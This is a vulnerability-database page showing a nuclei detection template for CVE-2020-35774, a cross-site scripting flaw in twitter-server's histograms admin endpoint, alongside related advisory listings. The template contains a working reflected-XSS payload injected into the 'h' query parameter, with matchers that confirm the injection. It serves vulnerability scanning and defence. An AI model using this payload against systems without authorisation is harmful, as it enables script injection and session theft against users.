Lucene search
K

twitter-server Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

twitter-server XSS vulnerability in histograms componen

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-35774
16 Sep 202416:08
circl
CNNVD
Twitter TwitterServer 跨站脚本漏洞
29 Dec 202000:00
cnnvd
CNVD
Twitter TwitterServer Cross-Site Scripting Vulnerability
31 Dec 202000:00
cnvd
CVE
CVE-2020-35774
29 Dec 202017:54
cve
Cvelist
CVE-2020-35774
29 Dec 202017:54
cvelist
Github Security Blog
TwitterServer Cross-site Scripting via /histograms endpoint
9 Feb 202222:37
github
NVD
CVE-2020-35774
29 Dec 202018:15
nvd
OSV
GHSA-3MQV-8GXG-PFM4 TwitterServer Cross-site Scripting via /histograms endpoint
9 Feb 202222:37
osv
Prion
Design/Logic Flaw
29 Dec 202018:15
prion
RedhatCVE
CVE-2020-35774
22 May 202515:33
redhatcve
Rows per page
id: CVE-2020-35774

info:
  name: twitter-server Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.
  remediation: |
    Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability.
  reference:
    - https://advisory.checkmarx.net/advisory/CX-2020-4287
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35774
    - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c
    - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-35774
    cwe-id: CWE-79
    epss-score: 0.87622
    epss-percentile: 0.99736
    cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: twitter
    product: twitter-server
  tags: cve2020,cve,xss,twitter-server,twitter,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201f1111abc580e76aa7cb4fbea17047934de0ff1002b1402d48a59b30bd78898d022076ba95ee73f126027d5a79484d9ad1e30b605c98bf1cc34e4da4815a9804714a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.15.4
EPSS0.87622
19